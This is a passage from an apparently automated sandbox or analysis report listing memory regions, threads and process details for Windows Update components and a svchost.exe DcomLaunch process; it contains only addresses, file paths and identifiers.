filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5993
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5994
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5995
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5996
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5997
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5998
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5999
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6000
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6001
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6002
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6003
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6004
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6005
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6006
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6007
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6008
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6009
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6010
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6011
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6012
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6013
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6014
start_va = 0x1420000
end_va = 0x142ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001420000"
filename = ""
Region:
id = 6015
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6016
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6017
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6018
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6019
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6020
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6021
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6022
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6023
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6024
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6025
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6026
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6027
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6028
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6029
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6030
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6031
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6035
start_va = 0x22d0000
end_va = 0x234ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022d0000"
filename = ""
Region:
id = 6036
start_va = 0x2b20000
end_va = 0x2b9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b20000"
filename = ""
Region:
id = 6037
start_va = 0x7fef3d80000
end_va = 0x7fef3f53fff
monitored = 0
entry_point = 0x7fef3db6b00
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")
Region:
id = 6038
start_va = 0x6cf0000
end_va = 0x6efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006cf0000"
filename = ""
Region:
id = 6039
start_va = 0x2980000
end_va = 0x2a8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002980000"
filename = ""
Region:
id = 6040
start_va = 0x6cf0000
end_va = 0x6e5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006cf0000"
filename = ""
Region:
id = 6041
start_va = 0x6e80000
end_va = 0x6efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006e80000"
filename = ""
Region:
id = 6042
start_va = 0x6f00000
end_va = 0x72fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006f00000"
filename = ""
Region:
id = 6043
start_va = 0x10a0000
end_va = 0x10a0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msxml3r.dll"
filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll")
Region:
id = 6044
start_va = 0x10b0000
end_va = 0x10cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010b0000"
filename = ""
Region:
id = 6045
start_va = 0x7fefaab0000
end_va = 0x7fefab2bfff
monitored = 0
entry_point = 0x7fefaab11d4
region_type = mapped_file
name = "wer.dll"
filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")
Region:
id = 6046
start_va = 0x7300000
end_va = 0x746ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007300000"
filename = ""
Region:
id = 6047
start_va = 0x10d0000
end_va = 0x10d2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wuaueng.dll.mui"
filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui")
Region:
id = 6048
start_va = 0x10e0000
end_va = 0x10effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6049
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6050
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6051
start_va = 0x10e0000
end_va = 0x10effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6052
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6053
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6054
start_va = 0x23b0000
end_va = 0x242ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023b0000"
filename = ""
Region:
id = 6055
start_va = 0x2bb0000
end_va = 0x2c2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002bb0000"
filename = ""
Region:
id = 6056
start_va = 0x2ce0000
end_va = 0x2d5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ce0000"
filename = ""
Region:
id = 6057
start_va = 0x5910000
end_va = 0x598ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005910000"
filename = ""
Region:
id = 6058
start_va = 0x7fffff88000
end_va = 0x7fffff89fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff88000"
filename = ""
Region:
id = 6059
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 6060
start_va = 0x7fffff8e000
end_va = 0x7fffff8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8e000"
filename = ""
Region:
id = 6061
start_va = 0x7fffff94000
end_va = 0x7fffff95fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff94000"
filename = ""
Region:
id = 6070
start_va = 0x6cf0000
end_va = 0x6d99fff
monitored = 0
entry_point = 0x6cf4104
region_type = mapped_file
name = "wuapi.dll"
filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll")
Region:
id = 6071
start_va = 0x6de0000
end_va = 0x6e5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006de0000"
filename = ""
Region:
id = 6072
start_va = 0x10e0000
end_va = 0x10ecfff
monitored = 0
entry_point = 0x10ea138
region_type = mapped_file
name = "wuauclt.exe"
filename = "\\Windows\\System32\\wuauclt.exe" (normalized: "c:\\windows\\system32\\wuauclt.exe")
Region:
id = 6073
start_va = 0x7470000
end_va = 0x76befff
monitored = 0
entry_point = 0x747236c
region_type = mapped_file
name = "wuaueng.dll"
filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll")
Region:
id = 6074
start_va = 0x10e0000
end_va = 0x10effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6075
start_va = 0x6d10000
end_va = 0x6d8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006d10000"
filename = ""
Region:
id = 6076
start_va = 0x7fffff86000
end_va = 0x7fffff87fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff86000"
filename = ""
Region:
id = 6077
start_va = 0x10f0000
end_va = 0x10fffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 6078
start_va = 0x1100000
end_va = 0x110ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Thread:
id = 155
os_tid = 0x49c
Thread:
id = 156
os_tid = 0x474
Thread:
id = 157
os_tid = 0x470
Thread:
id = 158
os_tid = 0x418
Thread:
id = 159
os_tid = 0x414
Thread:
id = 160
os_tid = 0x46c
Thread:
id = 161
os_tid = 0x468
Thread:
id = 162
os_tid = 0x460
Thread:
id = 163
os_tid = 0x21c
Thread:
id = 164
os_tid = 0x1e0
Thread:
id = 165
os_tid = 0xd0
Thread:
id = 166
os_tid = 0x3f4
Thread:
id = 167
os_tid = 0x3e8
Thread:
id = 168
os_tid = 0x39c
Thread:
id = 169
os_tid = 0x398
Thread:
id = 170
os_tid = 0x394
Thread:
id = 171
os_tid = 0x38c
Thread:
id = 172
os_tid = 0x37c
Thread:
id = 173
os_tid = 0x374
Thread:
id = 175
os_tid = 0x614
Thread:
id = 176
os_tid = 0x618
Thread:
id = 177
os_tid = 0x63c
Thread:
id = 178
os_tid = 0x650
Thread:
id = 179
os_tid = 0x654
Thread:
id = 180
os_tid = 0x660
Thread:
id = 181
os_tid = 0x674
Thread:
id = 182
os_tid = 0x67c
Thread:
id = 183
os_tid = 0x680
Thread:
id = 184
os_tid = 0x68c
Thread:
id = 185
os_tid = 0x69c
Thread:
id = 186
os_tid = 0x6ac
Thread:
id = 187
os_tid = 0x6b8
Thread:
id = 188
os_tid = 0x6c0
Thread:
id = 189
os_tid = 0x6c4
Thread:
id = 190
os_tid = 0x6c8
Thread:
id = 191
os_tid = 0x704
Thread:
id = 192
os_tid = 0x784
Thread:
id = 193
os_tid = 0x788
Thread:
id = 194
os_tid = 0x78c
Thread:
id = 195
os_tid = 0x798
Thread:
id = 196
os_tid = 0x7a0
Thread:
id = 197
os_tid = 0x7a4
Thread:
id = 198
os_tid = 0x7a8
Thread:
id = 199
os_tid = 0x5bc
Thread:
id = 200
os_tid = 0x5c4
Thread:
id = 201
os_tid = 0x5cc
Thread:
id = 202
os_tid = 0x5d8
Thread:
id = 203
os_tid = 0x3a4
Thread:
id = 204
os_tid = 0x610
Thread:
id = 205
os_tid = 0x630
Thread:
id = 206
os_tid = 0x648
Thread:
id = 227
os_tid = 0x334
Thread:
id = 228
os_tid = 0x330
Thread:
id = 229
os_tid = 0x32c
Thread:
id = 230
os_tid = 0x72c
Thread:
id = 231
os_tid = 0x344
Thread:
id = 232
os_tid = 0x324
Thread:
id = 233
os_tid = 0x328
Thread:
id = 234
os_tid = 0x33c
Thread:
id = 235
os_tid = 0x340
Thread:
id = 236
os_tid = 0x31c
Thread:
id = 237
os_tid = 0x318
Thread:
id = 238
os_tid = 0x66c
Thread:
id = 266
os_tid = 0x794
Thread:
id = 267
os_tid = 0x520
Thread:
id = 268
os_tid = 0x764
Thread:
id = 269
os_tid = 0x74c
Thread:
id = 270
os_tid = 0x490
Thread:
id = 271
os_tid = 0x4c4
Thread:
id = 272
os_tid = 0x72c
Thread:
id = 273
os_tid = 0x4dc
Thread:
id = 274
os_tid = 0x324
Thread:
id = 275
os_tid = 0x33c
Thread:
id = 276
os_tid = 0x69c
Thread:
id = 278
os_tid = 0x568
Thread:
id = 279
os_tid = 0x510
Thread:
id = 280
os_tid = 0x45c
Thread:
id = 281
os_tid = 0x448
Thread:
id = 282
os_tid = 0x528
Thread:
id = 285
os_tid = 0x9c
Process:
id = "28"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0xbf22000"
os_pid = "0x260"
os_integrity_level = "0x4000"
os_privileges = "0x60b00080"
monitor_reason = "rpc_server"
parent_id = "27"
os_parent_pid = "0x1d0"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00007866" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 4414
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4415
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 4416
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4417
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4418
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 4419
start_va = 0xd0000
end_va = 0x136fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4420
start_va = 0x140000
end_va = 0x23ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 4421
start_va = 0x240000
end_va = 0x240fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000240000"
filename = ""
Region:
id = 4422
start_va = 0x250000
end_va = 0x250fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 4423
start_va = 0x260000
end_va = 0x35ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000260000"
filename = ""
Region:
id = 4424
start_va = 0x360000
end_va = 0x36cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 4425
start_va = 0x370000
end_va = 0x370fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000370000"
filename = ""
Region:
id = 4426
start_va = 0x380000
end_va = 0x380fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000380000"
filename = ""
Region:
id = 4427
start_va = 0x390000
end_va = 0x390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000390000"
filename = ""
Region:
id = 4428
start_va = 0x3a0000
end_va = 0x3a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003a0000"
filename = ""
Region:
id = 4429
start_va = 0x3b0000
end_va = 0x3b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 4430
start_va = 0x3e0000
end_va = 0x45ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 4431
start_va = 0x490000
end_va = 0x50ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 4432
start_va = 0x550000
end_va = 0x55ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000550000"
filename = ""
Region:
id = 4433
start_va = 0x560000
end_va = 0x5dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000560000"
filename = ""
Region:
id = 4434
start_va = 0x650000
end_va = 0x91efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4435
start_va = 0x920000
end_va = 0xaa7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000920000"
filename = ""
Region:
id = 4436
start_va = 0xab0000
end_va = 0xc30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ab0000"
filename = ""
Region:
id = 4437
start_va = 0xc40000
end_va = 0xcfffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c40000"
filename = ""
Region:
id = 4438
start_va = 0xd10000
end_va = 0xd8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d10000"
filename = ""
Region:
id = 4439
start_va = 0xd90000
end_va = 0xd9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d90000"
filename = ""
Region:
id = 4440
start_va = 0xe70000
end_va = 0xeeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e70000"
filename = ""
Region:
id = 4441
start_va = 0xf40000
end_va = 0xfbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f40000"
filename = ""
Region:
id = 4442
start_va = 0x1080000
end_va = 0x117ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001080000"
filename = ""
Region:
id = 4443
start_va = 0x11c0000
end_va = 0x123ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011c0000"
filename = ""
Region:
id = 4444
start_va = 0x12a0000
end_va = 0x131ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012a0000"
filename = ""
Region:
id = 4445
start_va = 0x1320000
end_va = 0x141ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001320000"
filename = ""
Region:
id = 4446
start_va = 0x1460000
end_va = 0x14dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001460000"
filename = ""
Region:
id = 4447
start_va = 0x1550000
end_va = 0x15cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001550000"
filename = ""
Region:
id = 4448
start_va = 0x1660000
end_va = 0x16dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001660000"
filename = ""
Region:
id = 4449
start_va = 0x16e0000
end_va = 0x17dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000016e0000"
filename = ""
Region:
id = 4450
start_va = 0x18e0000
end_va = 0x195ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000018e0000"
filename = ""
Region:
id = 4451
start_va = 0x1a50000
end_va = 0x1acffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a50000"
filename = ""
Region:
id = 4452
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4453
start_va = 0x77b10000
end_va = 0x77c2efff
